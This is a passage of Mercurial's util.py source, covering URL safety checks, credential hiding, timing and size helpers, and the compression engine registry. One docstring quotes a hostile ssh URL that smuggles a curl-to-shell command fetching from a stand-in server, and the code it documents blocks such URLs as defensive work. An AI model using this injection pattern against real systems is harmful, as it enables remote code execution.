3013 3015 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3014 3016 Let's prevent these potentially exploited urls entirely and warn the
3015 3017 user.
3016 3018
3017 3019 Raises an error.Abort when the url is unsafe.
3018 3020 """
3019 3021 path = urlreq.unquote(path)
3020 3022 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3021 3023 raise error.Abort(_('potentially unsafe url: %r') %
3022 3024 (path,))
3023 3025
3024 3026 def hidepassword(u):
3025 3027 '''hide user credential in a url string'''
3026 3028 u = url(u)
3027 3029 if u.passwd:
3028 3030 u.passwd = '***'
3029 3031 return bytes(u)
3030 3032
3031 3033 def removeauth(u):
3032 3034 '''remove all authentication information from a url string'''
3033 3035 u = url(u)
3034 3036 u.user = u.passwd = None
3035 3037 return str(u)
3036 3038
3037 3039 timecount = unitcountfn(
3038 3040 (1, 1e3, _('%.0f s')),
3039 3041 (100, 1, _('%.1f s')),
3040 3042 (10, 1, _('%.2f s')),
3041 3043 (1, 1, _('%.3f s')),
3042 3044 (100, 0.001, _('%.1f ms')),
3043 3045 (10, 0.001, _('%.2f ms')),
3044 3046 (1, 0.001, _('%.3f ms')),
3045 3047 (100, 0.000001, _('%.1f us')),
3046 3048 (10, 0.000001, _('%.2f us')),
3047 3049 (1, 0.000001, _('%.3f us')),
3048 3050 (100, 0.000000001, _('%.1f ns')),
3049 3051 (10, 0.000000001, _('%.2f ns')),
3050 3052 (1, 0.000000001, _('%.3f ns')),
3051 3053 )
3052 3054
3053 3055 _timenesting = [0]
3054 3056
3055 3057 def timed(func):
3056 3058 '''Report the execution time of a function call to stderr.
3057 3059
3058 3060 During development, use as a decorator when you need to measure
3059 3061 the cost of a function, e.g. as follows:
3060 3062
3061 3063 @util.timed
3062 3064 def foo(a, b, c):
3063 3065 pass
3064 3066 '''
3065 3067
3066 3068 def wrapper(*args, **kwargs):
3067 3069 start = timer()
3068 3070 indent = 2
3069 3071 _timenesting[0] += indent
3070 3072 try:
3071 3073 return func(*args, **kwargs)
3072 3074 finally:
3073 3075 elapsed = timer() - start
3074 3076 _timenesting[0] -= indent
3075 3077 stderr.write('%s%s: %s\n' %
3076 3078 (' ' * _timenesting[0], func.__name__,
3077 3079 timecount(elapsed)))
3078 3080 return wrapper
3079 3081
3080 3082 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3081 3083 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3082 3084
3083 3085 def sizetoint(s):
3084 3086 '''Convert a space specifier to a byte count.
3085 3087
3086 3088 >>> sizetoint(b'30')
3087 3089 30
3088 3090 >>> sizetoint(b'2.2kb')
3089 3091 2252
3090 3092 >>> sizetoint(b'6M')
3091 3093 6291456
3092 3094 '''
3093 3095 t = s.strip().lower()
3094 3096 try:
3095 3097 for k, u in _sizeunits:
3096 3098 if t.endswith(k):
3097 3099 return int(float(t[:-len(k)]) * u)
3098 3100 return int(t)
3099 3101 except ValueError:
3100 3102 raise error.ParseError(_("couldn't parse size: %s") % s)
3101 3103
3102 3104 class hooks(object):
3103 3105 '''A collection of hook functions that can be used to extend a
3104 3106 function's behavior. Hooks are called in lexicographic order,
3105 3107 based on the names of their sources.'''
3106 3108
3107 3109 def __init__(self):
3108 3110 self._hooks = []
3109 3111
3110 3112 def add(self, source, hook):
3111 3113 self._hooks.append((source, hook))
3112 3114
3113 3115 def __call__(self, *args):
3114 3116 self._hooks.sort(key=lambda x: x[0])
3115 3117 results = []
3116 3118 for source, hook in self._hooks:
3117 3119 results.append(hook(*args))
3118 3120 return results
3119 3121
3120 3122 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3121 3123 '''Yields lines for a nicely formatted stacktrace.
3122 3124 Skips the 'skip' last entries, then return the last 'depth' entries.
3123 3125 Each file+linenumber is formatted according to fileline.
3124 3126 Each line is formatted according to line.
3125 3127 If line is None, it yields:
3126 3128 length of longest filepath+line number,
3127 3129 filepath+linenumber,
3128 3130 function
3129 3131
3130 3132 Not be used in production code but very convenient while developing.
3131 3133 '''
3132 3134 entries = [(fileline % (fn, ln), func)
3133 3135 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3134 3136 ][-depth:]
3135 3137 if entries:
3136 3138 fnmax = max(len(entry[0]) for entry in entries)
3137 3139 for fnln, func in entries:
3138 3140 if line is None:
3139 3141 yield (fnmax, fnln, func)
3140 3142 else:
3141 3143 yield line % (fnmax, fnln, func)
3142 3144
3143 3145 def debugstacktrace(msg='stacktrace', skip=0,
3144 3146 f=stderr, otherf=stdout, depth=0):
3145 3147 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3146 3148 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3147 3149 By default it will flush stdout first.
3148 3150 It can be used everywhere and intentionally does not require an ui object.
3149 3151 Not be used in production code but very convenient while developing.
3150 3152 '''
3151 3153 if otherf:
3152 3154 otherf.flush()
3153 3155 f.write('%s at:\n' % msg.rstrip())
3154 3156 for line in getstackframes(skip + 1, depth=depth):
3155 3157 f.write(line)
3156 3158 f.flush()
3157 3159
3158 3160 class dirs(object):
3159 3161 '''a multiset of directory names from a dirstate or manifest'''
3160 3162
3161 3163 def __init__(self, map, skip=None):
3162 3164 self._dirs = {}
3163 3165 addpath = self.addpath
3164 3166 if safehasattr(map, 'iteritems') and skip is not None:
3165 3167 for f, s in map.iteritems():
3166 3168 if s[0] != skip:
3167 3169 addpath(f)
3168 3170 else:
3169 3171 for f in map:
3170 3172 addpath(f)
3171 3173
3172 3174 def addpath(self, path):
3173 3175 dirs = self._dirs
3174 3176 for base in finddirs(path):
3175 3177 if base in dirs:
3176 3178 dirs[base] += 1
3177 3179 return
3178 3180 dirs[base] = 1
3179 3181
3180 3182 def delpath(self, path):
3181 3183 dirs = self._dirs
3182 3184 for base in finddirs(path):
3183 3185 if dirs[base] > 1:
3184 3186 dirs[base] -= 1
3185 3187 return
3186 3188 del dirs[base]
3187 3189
3188 3190 def __iter__(self):
3189 3191 return iter(self._dirs)
3190 3192
3191 3193 def __contains__(self, d):
3192 3194 return d in self._dirs
3193 3195
3194 3196 if safehasattr(parsers, 'dirs'):
3195 3197 dirs = parsers.dirs
3196 3198
3197 3199 def finddirs(path):
3198 3200 pos = path.rfind('/')
3199 3201 while pos != -1:
3200 3202 yield path[:pos]
3201 3203 pos = path.rfind('/', 0, pos)
3202 3204
3203 3205 # compression code
3204 3206
3205 3207 SERVERROLE = 'server'
3206 3208 CLIENTROLE = 'client'
3207 3209
3208 3210 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3209 3211 (u'name', u'serverpriority',
3210 3212 u'clientpriority'))
3211 3213
3212 3214 class compressormanager(object):
3213 3215 """Holds registrations of various compression engines.
3214 3216
3215 3217 This class essentially abstracts the differences between compression
3216 3218 engines to allow new compression formats to be added easily, possibly from
3217 3219 extensions.
3218 3220
3219 3221 Compressors are registered against the global instance by calling its
3220 3222 ``register()`` method.
3221 3223 """
3222 3224 def __init__(self):
3223 3225 self._engines = {}
3224 3226 # Bundle spec human name to engine name.
3225 3227 self._bundlenames = {}
3226 3228 # Internal bundle identifier to engine name.
3227 3229 self._bundletypes = {}
3228 3230 # Revlog header to engine name.
3229 3231 self._revlogheaders = {}
3230 3232 # Wire proto identifier to engine name.
3231 3233 self._wiretypes = {}
3232 3234
3233 3235 def __getitem__(self, key):
3234 3236 return self._engines[key]
3235 3237
3236 3238 def __contains__(self, key):
3237 3239 return key in self._engines
3238 3240
3239 3241 def __iter__(self):
3240 3242 return iter(self._engines.keys())
3241 3243
3242 3244 def register(self, engine):
3243 3245 """Register a compression engine with the manager.
3244 3246
3245 3247 The argument must be a ``compressionengine`` instance.
3246 3248 """
3247 3249 if not isinstance(engine, compressionengine):
3248 3250 raise ValueError(_('argument must be a compressionengine'))
3249 3251
3250 3252 name = engine.name()
3251 3253
3252 3254 if name in self._engines:
3253 3255 raise error.Abort(_('compression engine %s already registered') %
3254 3256 name)
3255 3257
3256 3258 bundleinfo = engine.bundletype()
3257 3259 if bundleinfo:
3258 3260 bundlename, bundletype = bundleinfo
3259 3261
3260 3262 if bundlename in self._bundlenames:
3261 3263 raise error.Abort(_('bundle name %s already registered') %
3262 3264 bundlename)
3263 3265 if bundletype in self._bundletypes:
3264 3266 raise error.Abort(_('bundle type %s already registered by %s') %
3265 3267 (bundletype, self._bundletypes[bundletype]))
3266 3268
3267 3269 # No external facing name declared.
3268 3270 if bundlename:
3269 3271 self._bundlenames[bundlename] = name
3270 3272
3271 3273 self._bundletypes[bundletype] = name
3272 3274
3273 3275 wiresupport = engine.wireprotosupport()
3274 3276 if wiresupport:
3275 3277 wiretype = wiresupport.name
3276 3278 if wiretype in self._wiretypes:
3277 3279 raise error.Abort(_('wire protocol compression %s already '
3278 3280 'registered by %s') %
3279 3281 (wiretype, self._wiretypes[wiretype]))
3280 3282
3281 3283 self._wiretypes[wiretype] = name
3282 3284
3283 3285 revlogheader = engine.revlogheader()
3284 3286 if revlogheader and revlogheader in self._revlogheaders:
3285 3287 raise error.Abort(_('revlog header %s already registered by %s') %
3286 3288 (revlogheader, self._revlogheaders[revlogheader]))
3287 3289
3288 3290 if revlogheader:
3289 3291 self._revlogheaders[revlogheader] = name
3290 3292
3291 3293 self._engines[name] = engine
3292 3294
3293 3295 @property
3294 3296 def supportedbundlenames(self):
3295 3297 return set(self._bundlenames.keys())
3296 3298
3297 3299 @property
3298 3300 def supportedbundletypes(self):
3299 3301 return set(self._bundletypes.keys())
3300 3302
3301 3303 def forbundlename(self, bundlename):
3302 3304 """Obtain a compression engine registered to a bundle name.
3303 3305
3304 3306 Will raise KeyError if the bundle type isn't registered.
3305 3307
3306 3308 Will abort if the engine is known but not available.
3307 3309 """
3308 3310 engine = self._engines[self._bundlenames[bundlename]]
3309 3311 if not engine.available():
3310 3312 raise error.Abort(_('compression engine %s could not be loaded') %
3311 3313 engine.name())
3312 3314 return engine
3313 3315
3314 3316 def forbundletype(self, bundletype):
3315 3317 """Obtain a compression engine registered to a bundle type.
3316 3318
3317 3319 Will raise KeyError if the bundle type isn't registered.
3318 3320
3319 3321 Will abort if the engine is known but not available.
3320 3322 """
3321 3323 engine = self._engines[self._bundletypes[bundletype]]
3322 3324 if not engine.available():
3323 3325 raise error.Abort(_('compression engine %s could not be loaded') %
3324 3326 engine.name())
3325 3327 return engine
3326 3328
3327 3329 def supportedwireengines(self, role, onlyavailable=True):
3328 3330 """Obtain compression engines that support the wire protocol.
3329 3331
3330 3332 Returns a list of engines in prioritized order, most desired first.
3331 3333
3332 3334 If ``onlyavailable`` is set, filter out engines that can't be
3333 3335 loaded.
3334 3336 """
3335 3337 assert role in (SERVERROLE, CLIENTROLE)
3336 3338
3337 3339 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3338 3340
3339 3341 engines = [self._engines[e] for e in self._wiretypes.values()]
3340 3342 if onlyavailable:
3341 3343 engines = [e for e in engines if e.available()]
3342 3344
3343 3345 def getkey(e):
3344 3346 # Sort first by priority, highest first. In case of tie, sort
3345 3347 # alphabetically. This is arbitrary, but ensures output is
3346 3348 # stable.
3347 3349 w = e.wireprotosupport()
3348 3350 return -1 * getattr(w, attr), w.name
3349 3351
3350 3352 return list(sorted(engines, key=getkey))
3351 3353
3352 3354 def forwiretype(self, wiretype):
3353 3355 engine = self._engines[self._wiretypes[wiretype]]
3354 3356 if not engine.available():
3355 3357 raise error.Abort(_('compression engine %s could not be loaded') %
3356 3358 engine.name())
3357 3359 return engine
3358 3360
3359 3361 def forrevlogheader(self, header):
3360 3362 """Obtain a compression engine registered to a revlog header.
3361 3363
3362 3364 Will raise KeyError if the revlog header value isn't registered.
3363 3365 """
3364 3366 return self._engines[self._revlogheaders[header]]
3365 3367
3366 3368 compengines = compressormanager()
3367 3369
3368 3370 class compressionengine(object):
3369 3371 """Base class for compression engines.
3370 3372
3371 3373 Compression engines must implement the interface defined by this class.
3372 3374 """
3373 3375 def name(self):
3374 3376 """Returns the name of the compression engine.
3375 3377
3376 3378 This is the key the engine is registered under.
3377 3379
3378 3380 This method must be implemented.
3379 3381 """
3380 3382 raise NotImplementedError()
3381 3383
3382 3384 def available(self):
3383 3385 """Whether the compression engine is available.
3384 3386
3385 3387 The intent of this method is to allow optional compression engines
3386 3388 that may not be available in all installations (such as engines relying
3387 3389 on C extensions that may not be present).
3388 3390 """
3389 3391 return True
3390 3392
3391 3393 def bundletype(self):
3392 3394 """Describes bundle identifiers for this engine.
3393 3395
3394 3396 If this compression engine isn't supported for bundles, returns None.
3395 3397
3396 3398 If this engine can be used for bundles, returns a 2-tuple of strings of
3397 3399 the user-facing "bundle spec" compression name and an internal
3398 3400 identifier used to denote the compression format within bundles. To
3399 3401 exclude the name from external usage, set the first element to ``None``.
3400 3402
3401 3403 If bundle compression is supported, the class must also implement
3402 3404 ``compressstream`` and `decompressorreader``.
3403 3405
3404 3406 The docstring of this method is used in the help system to tell users
3405 3407 about this engine.
3406 3408 """
3407 3409 return None
3408 3410
3409 3411 def wireprotosupport(self):
3410 3412 """Declare support for this compression format on the wire protocol.
3411 3413
3412 3414 If this compression engine isn't supported for compressing wire
3413 3415 protocol payloads, returns None.
3414 3416
3415 3417 Otherwise, returns ``compenginewireprotosupport`` with the following
3416 3418 fields:
3417 3419
3418 3420 * String format identifier
3419 3421 * Integer priority for the server
3420 3422 * Integer priority for the client
3421 3423
3422 3424 The integer priorities are used to order the advertisement of format
3423 3425 support by server and client. The highest integer is advertised
3424 3426 first. Integers with non-positive values aren't advertised.
3425 3427
3426 3428 The priority values are somewhat arbitrary and only used for default
3427 3429 ordering. The relative order can be changed via config options.
3428 3430
3429 3431 If wire protocol compression is supported, the class must also implement
3430 3432 ``compressstream`` and ``decompressorreader``.
3431 3433 """
3432 3434 return None
3433 3435
3434 3436 def revlogheader(self):
3435 3437 """Header added to revlog chunks that identifies this engine.
3436 3438
3437 3439 If this engine can be used to compress revlogs, this method should
3438 3440 return the bytes used to identify chunks compressed with this engine.
3439 3441 Else, the method should return ``None`` to indicate it does not
3440 3442 participate in revlog compression.
3441 3443 """
3442 3444 return None
3443 3445
3444 3446 def compressstream(self, it, opts=None):
3445 3447 """Compress an iterator of chunks.
3446 3448
3447 3449 The method receives an iterator (ideally a generator) of chunks of
3448 3450 bytes to be compressed. It returns an iterator (ideally a generator)
3449 3451 of bytes of chunks representing the compressed output.
3450 3452
3451 3453 Optionally accepts an argument defining how to perform compression.
3452 3454 Each engine treats this argument differently.
3453 3455 """
3454 3456 raise NotImplementedError()
3455 3457
3456 3458 def decompressorreader(self, fh):
3457 3459 """Perform decompression on a file object.
3458 3460
3459 3461 Argument is an object with a ``read(size)`` method that returns
3460 3462 compressed data. Return value is an object with a ``read(size)`` that
3461 3463 returns uncompressed data.
3462 3464 """
3463 3465 raise NotImplementedError()
3464 3466
3465 3467 def revlogcompressor(self, opts=None):
3466 3468 """Obtain an object that can be used to compress revlog entries.
3467 3469
3468 3470 The object has a ``compress(data)`` method that compresses binary
3469 3471 data. This method returns compressed binary data or ``None`` if
3470 3472 the data could not be compressed (too small, not compressible, etc).
3471 3473 The returned data should have a header uniquely identifying this
3472 3474 compression format so decompression can be routed to this engine.
3473 3475 This header should be identified by the ``revlogheader()`` return
3474 3476 value.
3475 3477
3476 3478 The object has a ``decompress(data)`` method that decompresses
3477 3479 data. The method will only be called if ``data`` begins with
3478 3480 ``revlogheader()``. The method should return the raw, uncompressed
3479 3481 data or raise a ``RevlogError``.
3480 3482
3481 3483 The object is reusable but is not thread safe.
3482 3484 """
3483 3485 raise NotImplementedError()
3484 3486
3485 3487 class _zlibengine(compressionengine):
3486 3488 def name(self):
3487 3489 return 'zlib'
3488 3490
3489 3491 def bundletype(self):
3490 3492 """zlib compression using the DEFLATE algorithm.
3491 3493
3492 3494 All Mercurial clients should support this format. The compression
3493 3495 algorithm strikes a reasonable balance between compression ratio
3494 3496 and size.
3495 3497 """
3496 3498 return 'gzip', 'GZ'
3497 3499
3498 3500 def wireprotosupport(self):
3499 3501 return compewireprotosupport('zlib', 20, 20)
3500 3502
3501 3503 def revlogheader(self):
3502 3504 return 'x'
3503 3505
3504 3506 def compressstream(self, it, opts=None):
3505 3507 opts = opts or {}
3506 3508
3507 3509 z = zlib.compressobj(opts.get('level', -1))
3508 3510 for chunk in it:
3509 3511 data = z.compress(chunk)
3510 3512 # Not all calls to compress emit data. It is cheaper to inspect
3511 3513 # here than to feed empty chunks through generator.
3512 3514 if data:
3513 3515 yield data
3514 3516
3515 3517 yield z.flush()
3516 3518
3517 3519 def decompressorreader(self, fh):
3518 3520 def gen():
3519 3521 d = zlib.decompressobj()
3520 3522 for chunk in filechunkiter(fh):
3521 3523 while chunk:
3522 3524 # Limit output size to limit memory.
3523 3525 yield d.decompress(chunk, 2 ** 18)
3524 3526 chunk = d.unconsumed_tail
3525 3527
3526 3528 return chunkbuffer(gen())
3527 3529
3528 3530 class zlibrevlogcompressor(object):
3529 3531 def compress(self, data):
3530 3532 insize = len(data)
3531 3533 # Caller handles empty input case.
3532 3534 assert insize > 0
3533 3535
3534 3536 if insize < 44:
3535 3537 return None
3536 3538
3537 3539 elif insize <= 1000000:
3538 3540 compressed = zlib.compress(data)
3539 3541 if len(compressed) < insize:
3540 3542 return compressed
3541 3543 return None
3542 3544
3543 3545 # zlib makes an internal copy of the input buffer, doubling
3544 3546 # memory usage for large inputs. So do streaming compression
3545 3547 # on large inputs.
3546 3548 else:
3547 3549 z = zlib.compressobj()
3548 3550 parts = []
3549 3551 pos = 0
3550 3552 while pos < insize:
3551 3553 pos2 = pos + 2**20
3552 3554 parts.append(z.compress(data[pos:pos2]))
3553 3555 pos = pos2
3554 3556 parts.append(z.flush())
3555 3557
3556 3558 if sum(map(len, parts)) < insize:
3557 3559 return ''.join(parts)
3558 3560 return None
3559 3561
3560 3562 def decompress(self, data):
3561 3563 try:
3562 3564 return zlib.decompress(data)
3563 3565 except zlib.error as e:
3564 3566 raise error.RevlogError(_('revlog decompress error: %s') %
3565 3567 str(e))
3566 3568
3567 3569 def revlogcompressor(self, opts=None):
3568 3570 return self.zlibrevlogcompressor()
3569 3571
3570 3572 compengines.register(_zlibengine())
3571 3573
3572 3574 class _bz2engine(compressionengine):
3573 3575 def name(self):
3574 3576 return 'bz2'
3575 3577
3576 3578 def bundletype(self):
3577 3579 """An algorithm that produces smaller bundles than ``gzip``.
3578 3580
3579 3581 All Mercurial clients should support this format.
3580 3582
3581 3583 This engine will likely produce smaller bundles than ``gzip`` but
3582 3584 will be significantly slower, both during compression and
3583 3585 decompression.
3584 3586
3585 3587 If available, the ``zstd`` engine can yield similar or better
3586 3588 compression at much higher speeds.
3587 3589 """
3588 3590 return 'bzip2', 'BZ'
3589 3591
3590 3592 # We declare a protocol name but don't advertise by default because
3591 3593 # it is slow.
3592 3594 def wireprotosupport(self):
3593 3595 return compewireprotosupport('bzip2', 0, 0)
3594 3596
3595 3597 def compressstream(self, it, opts=None):
3596 3598 opts = opts or {}
3597 3599 z = bz2.BZ2Compressor(opts.get('level', 9))
3598 3600 for chunk in it:
3599 3601 data = z.compress(chunk)
3600 3602 if data:
3601 3603 yield data
3602 3604
3603 3605 yield z.flush()
3604 3606
3605 3607 def decompressorreader(self, fh):
3606 3608 def gen():
3607 3609 d = bz2.BZ2Decompressor()
3608 3610 for chunk in filechunkiter(fh):
3609 3611 yield d.decompress(chunk)
3610 3612
3611 3613 return chunkbuffer(gen())
3612 3614
3613 3615 compengines.register(_bz2engine())
3614 3616
3615 3617 class _truncatedbz2engine(compressionengine):
3616 3618 def name(self):
3617 3619 return 'bz2truncated'
3618 3620
3619 3621 def bundletype(self):
3620 3622 return None, '_truncatedBZ'
3621 3623
3622 3624 # We don't implement compressstream because it is hackily handled elsewhere.
3623 3625
3624 3626 def decompressorreader(self, fh):
3625 3627 def gen():
3626 3628 # The input stream doesn't have the 'BZ' header. So add it back.
3627 3629 d = bz2.BZ2Decompressor()
3628 3630 d.decompress('BZ')
3629 3631 for chunk in filechunkiter(fh):
3630 3632 yield d.decompress(chunk)
3631 3633
3632 3634 return chunkbuffer(gen())
3633 3635
3634 3636 compengines.register(_truncatedbz2engine())
3635 3637
3636 3638 class _noopengine(compressionengine):
3637 3639 def name(self):
3638 3640 return 'none'
3639 3641
3640 3642 def bundletype(self):
3641 3643 """No compression is performed.
3642 3644
3643 3645 Use this compression engine to explicitly disable compression.
3644 3646 """
3645 3647 return 'none', 'UN'
3646 3648
3647 3649 # Clients always support uncompressed payloads. Servers don't because
3648 3650 # unless you are on a fast network, uncompressed payloads can easily
3649 3651 # saturate your network pipe.
3650 3652 def wireprotosupport(self):
3651 3653 return compewireprotosupport('none', 0, 10)
3652 3654
3653 3655 # We don't implement revlogheader because it is handled specially
3654 3656 # in the revlog class.
3655 3657
3656 3658 def compressstream(self, it, opts=None):
3657 3659 return it
3658 3660
3659 3661 def decompressorreader(self, fh):
3660 3662 return fh
3661 3663
3662 3664 class nooprevlogcompressor(object):
3663 3665 def compress(self, data):
3664 3666 return None
3665 3667
3666 3668 def revlogcompressor(self, opts=None):
3667 3669 return self.nooprevlogcompressor()
3668 3670
3669 3671 compengines.register(_noopengine())
3670 3672
3671 3673 class _zstdengine(compressionengine):
3672 3674 def name(self):
3673 3675 return 'zstd'
3674 3676
3675 3677 @propertycache
3676 3678 def _module(self):
3677 3679 # Not all installs have the zstd module available. So defer importing
3678 3680 # until first access.
3679 3681 try:
3680 3682 from . import zstd
3681 3683 # Force delayed import.
3682 3684 zstd.__version__
3683 3685 return zstd
3684 3686 except ImportError:
3685 3687 return None
3686 3688
3687 3689 def available(self):
3688 3690 return bool(self._module)
3689 3691
3690 3692 def bundletype(self):
3691 3693 """A modern compression algorithm that is fast and highly flexible.
3692 3694
3693 3695 Only supported by Mercurial 4.1 and newer clients.
3694 3696
3695 3697 With the default settings, zstd compression is both faster and yields
3696 3698 better compression than ``gzip``. It also frequently yields better
3697 3699 compression than ``bzip2`` while operating at much higher speeds.
3698 3700
3699 3701 If this engine is available and backwards compatibility is not a
3700 3702 concern, it is likely the best available engine.
3701 3703 """
3702 3704 return 'zstd', 'ZS'
3703 3705
3704 3706 def wireprotosupport(self):
3705 3707 return compewireprotosupport('zstd', 50, 50)
3706 3708
3707 3709 def revlogheader(self):
3708 3710 return '\x28'
3709 3711
3710 3712 def compressstream(self, it, opts=None):
3711 3713 opts = opts or {}
3712 3714 # zstd level 3 is almost always significantly faster than zlib
3713 3715 # while providing no worse compression. It strikes a good balance
3714 3716 # between speed and compression.
3715 3717 level = opts.get('level', 3)
3716 3718
3717 3719 zstd = self._module
3718 3720 z = zstd.ZstdCompressor(level=level).compressobj()
3719 3721 for chunk in it:
3720 3722 data = z.compress(chunk)
3721 3723 if data:
3722 3724 yield data
3723 3725
3724 3726 yield z.flush()
3725 3727
3726 3728 def decompressorreader(self, fh):
3727 3729 zstd = self._module
3728 3730 dctx = zstd.ZstdDecompressor()
3729 3731 return chunkbuffer(dctx.read_from(fh))
3730 3732
3731 3733 class zstdrevlogcompressor(object):
3732 3734 def __init__(self, zstd, level=3):
3733 3735 # Writing the content size adds a few bytes to the output. However,
3734 3736 # it allows decompression to be more optimal since we can
3735 3737 # pre-allocate a buffer to hold the result.
3736 3738 self._cctx = zstd.ZstdCompressor(level=level,
3737 3739 write_content_size=True)
3738 3740 self._dctx = zstd.ZstdDecompressor()
3739 3741 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3740 3742 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3741 3743
3742 3744 def compress(self, data):
3743 3745 insize = len(data)
3744 3746 # Caller handles empty input case.
3745 3747 assert insize > 0
3746 3748
3747 3749 if insize < 50:
3748 3750 return None
3749 3751
3750 3752 elif insize <= 1000000:
3751 3753 compressed = self._cctx.compress(data)
3752 3754 if len(compressed) < insize:
3753 3755 return compressed
3754 3756 return None
3755 3757 else:
3756 3758 z = self._cctx.compressobj()
3757 3759 chunks = []
3758 3760 pos = 0
3759 3761 while pos < insize:
3760 3762 pos2 = pos + self._compinsize
3761 3763 chunk = z.compress(data[pos:pos2])
3762 3764 if chunk:
3763 3765 chunks.append(chunk)
3764 3766 pos = pos2
3765 3767 chunks.append(z.flush())
3766 3768
3767 3769 if sum(map(len, chunks)) < insize:
3768 3770 return ''.join(chunks)
3769 3771 return None
3770 3772
3771 3773 def decompress(self, data):
3772 3774 insize = len(data)
3773 3775
3774 3776 try:
3775 3777 # This was measured to be faster than other streaming
3776 3778 # decompressors.
3777 3779 dobj = self._dctx.decompressobj()
3778 3780 chunks = []
3779 3781 pos = 0
3780 3782 while pos < insize:
3781 3783 pos2 = pos + self._decompinsize
3782 3784 chunk = dobj.decompress(data[pos:pos2])
3783 3785 if chunk:
3784 3786 chunks.append(chunk)
3785 3787 pos = pos2
3786 3788 # Frame should be exhausted, so no finish() API.
3787 3789
3788 3790 return ''.join(chunks)
3789 3791 except Exception as e:
3790 3792 raise error.RevlogError(_('revlog decompress error: %s') %
3791 3793 str(e))
3792 3794
3793 3795 def revlogcompressor(self, opts=None):
3794 3796 opts = opts or {}
3795 3797 return self.zstdrevlogcompressor(self._module,
3796 3798 level=opts.get('level', 3))
3797 3799
3798 3800 compengines.register(_zstdengine())
3799 3801
3800 3802 def bundlecompressiontopics():
3801 3803 """Obtains a list of available bundle compressions for use in help."""
3802 3804 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3803 3805 items = {}
3804 3806
3805 3807 # We need to format the docstring. So use a dummy object/type to hold it
3806 3808 # rather than mutating the original.
3807 3809 class docobject(object):
3808 3810 pass
3809 3811
3810 3812 for name in compengines:
3811 3813 engine = compengines[name]
3812 3814
3813 3815 if not engine.available():
3814 3816 continue
3815 3817
3816 3818 bt = engine.bundletype()
3817 3819 if not bt or not bt[0]:
3818 3820 continue
3819 3821
3820 3822 doc = pycompat.sysstr('``%s``\n %s') % (
3821 3823 bt[0], engine.bundletype.__doc__)
3822 3824
3823 3825 value = docobject()
3824 3826 value.__doc__ = doc
3825 3827 value._origdoc = engine.bundletype.__doc__
3826 3828 value._origfunc = engine.bundletype
3827 3829
3828 3830 items[bt[0]] = value
3829 3831
3830 3832 return items
3831 3833
3832 3834 i18nfunctions = bundlecompressiontopics().values()
3833 3835
3834 3836 # convenient shortcut
3835 3837 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now